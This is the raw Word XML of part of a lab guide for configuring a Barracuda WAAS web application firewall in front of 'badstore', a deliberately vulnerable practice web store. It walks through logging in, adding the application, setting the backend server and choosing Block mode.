    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="570EB99C" w14:textId="450C6FD8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4DEC2AA5">
        <w:rPr/>
        <w:t>They want to see what</w:t>
      </w:r>
      <w:r w:rsidR="68A91AB0">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4DEC2AA5">
        <w:rPr/>
        <w:t>attacks are happening, who is attacking, where they are coming from, what information have they potentially stolen</w:t>
      </w:r>
      <w:r w:rsidR="6AB206E9">
        <w:rPr/>
        <w:t>, what kinds of attacks are going on</w:t>
      </w:r>
      <w:r w:rsidR="4DEC2AA5">
        <w:rPr/>
        <w:t xml:space="preserve"> – they want that visibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="08698E1B" w14:textId="2EF78E8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="21646B42">
        <w:rPr/>
        <w:t>In order to prove the WAF is working, they have given you permission to perform some actual attacks, show that the attacks succeed, then turn the WAF on and show that the WAF blocks the attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="14E11A75" w14:textId="717AFEA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="274DFFE2">
        <w:rPr/>
        <w:t>They have seen a presentation from you on the OWASP Top 10, and they want to make sure those attacks are blocked but without slowing down their site or interfering with any functionality of the site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="00072E2A" w14:paraId="7439F58A" w14:textId="6047FE51">
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="676DDFB5">
        <w:rPr/>
        <w:t>web server</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5D6EA53F">
        <w:rPr/>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5D6EA53F">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5D6EA53F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="4A8ED484">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0A025FF3">
        <w:rPr/>
        <w:t>aka</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0A025FF3">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="27C3F8EA">
        <w:rPr/>
        <w:t xml:space="preserve">Backend Server or </w:t>
      </w:r>
      <w:r w:rsidR="180F921D">
        <w:rPr/>
        <w:t>just simpl</w:t>
      </w:r>
      <w:r w:rsidR="2E688B49">
        <w:rPr/>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="180F921D">
        <w:rPr/>
        <w:t xml:space="preserve"> “server</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="180F921D">
        <w:rPr/>
        <w:t>” )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="180F921D">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="60B63EE8">
        <w:rPr/>
        <w:t>currently located at the following site:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="00072E2A" w14:paraId="1006B661" w14:textId="3CAE706D">
      <w:r w:rsidR="5ED4A7F8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R167b0c158ac74f6e">
        <w:r w:rsidRPr="520BA0FC" w:rsidR="5ED4A7F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidRPr="520BA0FC" w:rsidR="5ED4A7F8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>://badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="5ED4A7F8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00C34781" w:rsidRDefault="41CBED3D" w14:paraId="1A5FFC11" w14:textId="2FADE086">
      <w:r w:rsidR="7468138B">
        <w:rPr/>
        <w:t>As you can see, the domain name is badstore.cudathon.com, and t</w:t>
      </w:r>
      <w:r w:rsidR="25F25D5D">
        <w:rPr/>
        <w:t>he server</w:t>
      </w:r>
      <w:r w:rsidR="2335A511">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="41CBED3D">
        <w:rPr/>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">listening on port </w:t>
      </w:r>
      <w:r w:rsidR="00C20278">
        <w:rPr/>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> using the HTTP protocol.</w:t>
      </w:r>
      <w:r w:rsidR="46B612E7">
        <w:rPr/>
        <w:t xml:space="preserve">  Not very secure!</w:t>
      </w:r>
      <w:r w:rsidR="4929A869">
        <w:rPr/>
        <w:t xml:space="preserve">  But that’s just the tip of the iceberg for this bad store.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="7B97A4E7" w14:textId="66AFC8B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="684072F7" w:rsidP="520BA0FC" w:rsidRDefault="684072F7" w14:paraId="4E781977" w14:textId="002DA29F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="684072F7">
        <w:rPr/>
        <w:t>Logging in to the lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="684072F7" w:rsidP="520BA0FC" w:rsidRDefault="684072F7" w14:paraId="46DE0B50" w14:textId="5E97F903">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="684072F7">
        <w:rPr/>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="Rd1230d50ea4b4613">
        <w:r w:rsidRPr="520BA0FC" w:rsidR="684072F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://waas.barracudanetworks.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="684072F7" w:rsidP="520BA0FC" w:rsidRDefault="684072F7" w14:paraId="657A8AD5" w14:textId="261234F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="684072F7">
        <w:rPr/>
        <w:t xml:space="preserve">Log in with the student email and password provided.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="684072F7" w:rsidP="520BA0FC" w:rsidRDefault="684072F7" w14:paraId="66B8CD8C" w14:textId="4FAB1993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="684072F7">
        <w:rPr/>
        <w:t xml:space="preserve">If you are a Barracuda employee or already have a WAAS login, you can use that. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="684072F7" w:rsidP="520BA0FC" w:rsidRDefault="684072F7" w14:paraId="7A25E31A" w14:textId="569D4126">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidR="684072F7">
        <w:rPr/>
        <w:t>Add the Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="00072E2A" w:rsidRDefault="00072E2A" w14:paraId="1DA459D7" w14:textId="5B4EB0AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>Click Add Application</w:t>
      </w:r>
      <w:r w:rsidR="43051B17">
        <w:rPr/>
        <w:t xml:space="preserve"> and then </w:t>
      </w:r>
      <w:r w:rsidR="3CC505E3">
        <w:rPr/>
        <w:t xml:space="preserve">follow the workflow, filling </w:t>
      </w:r>
      <w:r w:rsidR="43051B17">
        <w:rPr/>
        <w:t>in the Website, Endpoints, Backend Server, Select Mode, and Change DNS steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2591B92E" w:rsidP="520BA0FC" w:rsidRDefault="2591B92E" w14:paraId="62B5270F" w14:textId="2E40D350">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2591B92E">
        <w:rPr/>
        <w:t xml:space="preserve">Documentation Link: </w:t>
      </w:r>
      <w:hyperlink r:id="R888183bef2584c59">
        <w:r w:rsidRPr="5BDB08D7" w:rsidR="2591B92E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://campus.barracuda.com/product/WAAS/doc/77399164/getting-started</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="08F49EA0" w14:textId="604545AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="19C5FC8D">
        <w:rPr/>
        <w:t>Websites</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="77D56D1C" w14:textId="710F2087">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="617974A5">
        <w:rPr/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">nter </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="7FFCB20D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>bad</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="68FCAAA5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>store</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="68FCAAA5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="68FCAAA5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">( case doesn’t </w:t>
      </w:r>
      <w:r w:rsidR="68FCAAA5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>matter )</w:t>
      </w:r>
      <w:r w:rsidR="68FCAAA5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="530A9BF3">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>Application Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="4FB2B8C3" w14:textId="0A956D5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="55C19C3B">
        <w:rPr/>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidR="28F05B5A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="Rc37adbdf4fed45f8">
        <w:r w:rsidRPr="520BA0FC" w:rsidR="362CA319">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="362CA319">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">for the </w:t>
      </w:r>
      <w:r w:rsidR="225E966C">
        <w:rPr/>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t>omain</w:t>
      </w:r>
      <w:r w:rsidR="120B17D0">
        <w:rPr/>
        <w:t xml:space="preserve"> Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="550FA6D8" w14:textId="1093FE5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidR="48718651">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move on to the Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A34C537" w:rsidP="520BA0FC" w:rsidRDefault="1A34C537" w14:paraId="0C8BAF2E" w14:textId="2E625D1C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="1A34C537">
        <w:rPr/>
        <w:t>Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54C1B155" w:rsidP="520BA0FC" w:rsidRDefault="54C1B155" w14:paraId="6AE0D829" w14:textId="7926BC3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="54C1B155">
        <w:rPr/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="6D370CCB">
        <w:rPr/>
        <w:t xml:space="preserve">eave the defaults </w:t>
      </w:r>
      <w:r w:rsidR="6D370CCB">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="70D36FF3">
        <w:rPr/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="6D370CCB">
        <w:rPr/>
        <w:t xml:space="preserve">isten on </w:t>
      </w:r>
      <w:r w:rsidR="38562F9A">
        <w:rPr/>
        <w:t xml:space="preserve">ports </w:t>
      </w:r>
      <w:r w:rsidR="6D370CCB">
        <w:rPr/>
        <w:t xml:space="preserve">80 and 443, always redirect 80 to 443 ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D370CCB" w:rsidP="520BA0FC" w:rsidRDefault="6D370CCB" w14:paraId="45C09798" w14:textId="4584CF72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6D370CCB">
        <w:rPr/>
        <w:t xml:space="preserve">click </w:t>
      </w:r>
      <w:r w:rsidRPr="520BA0FC" w:rsidR="6D370CCB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidR="7857C58E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3E07C86F" w:rsidP="520BA0FC" w:rsidRDefault="3E07C86F" w14:paraId="29648CBE" w14:textId="1660AA88">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3E07C86F">
        <w:rPr/>
        <w:t>Backend Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3987BF86" w:rsidP="520BA0FC" w:rsidRDefault="3987BF86" w14:paraId="6CEE6ABC" w14:textId="402EDD7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="3987BF86">
        <w:rPr/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="38CF36A9">
        <w:rPr/>
        <w:t>elect HTTP from the drop-down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5432D145" w:rsidP="520BA0FC" w:rsidRDefault="5432D145" w14:paraId="74B03A94" w14:textId="0617AA5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5432D145">
        <w:rPr/>
        <w:t>Set the Backend Server to badstore.com if it is not already there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5432D145" w:rsidP="520BA0FC" w:rsidRDefault="5432D145" w14:paraId="3B497418" w14:textId="3976DC8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="5432D145">
        <w:rPr/>
        <w:t>Set the port to 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="21B1CB40" w:rsidRDefault="00072E2A" w14:paraId="0C425978" w14:textId="12968B37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00072E2A">
        <w:rPr/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Test Connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00072E2A" w:rsidP="520BA0FC" w:rsidRDefault="00072E2A" w14:paraId="73EF9ECF" w14:textId="03D2312F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2EA08856">
        <w:rPr/>
        <w:t>Assuming this succeeds, c</w:t>
      </w:r>
      <w:r w:rsidR="1E435EA2">
        <w:rPr/>
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00072E2A">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Continue</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="520B7BB8">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="218E9872" w:rsidP="520BA0FC" w:rsidRDefault="218E9872" w14:paraId="66BEA0DD" w14:textId="2A3B3F3F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="218E9872">
        <w:drawing>
          <wp:inline wp14:editId="5257FD04" wp14:anchorId="5C7626C0">
            <wp:extent cx="2933700" cy="1471551"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1688494665" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R4063e5fb10f049a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933700" cy="1471551"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="2D44E5D1" w:rsidP="520BA0FC" w:rsidRDefault="2D44E5D1" w14:paraId="476308F8" w14:textId="3D1FCE5D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="2D44E5D1">
        <w:rPr/>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidRDefault="520BA0FC" w14:paraId="51D80A7A" w14:textId="7AB93559">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4972C4C6" w:rsidP="520BA0FC" w:rsidRDefault="4972C4C6" w14:paraId="0690D32B" w14:textId="431D8EEE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidR="4972C4C6">
        <w:rPr/>
        <w:t>Select Mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="00072E2A" w:rsidRDefault="00844F45" w14:paraId="2ADAD574" w14:textId="23F7E707">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4972C4C6">
        <w:rPr/>
        <w:t>For Malicious Traffic</w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">, select </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="0BC85D24">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
    </w:p>
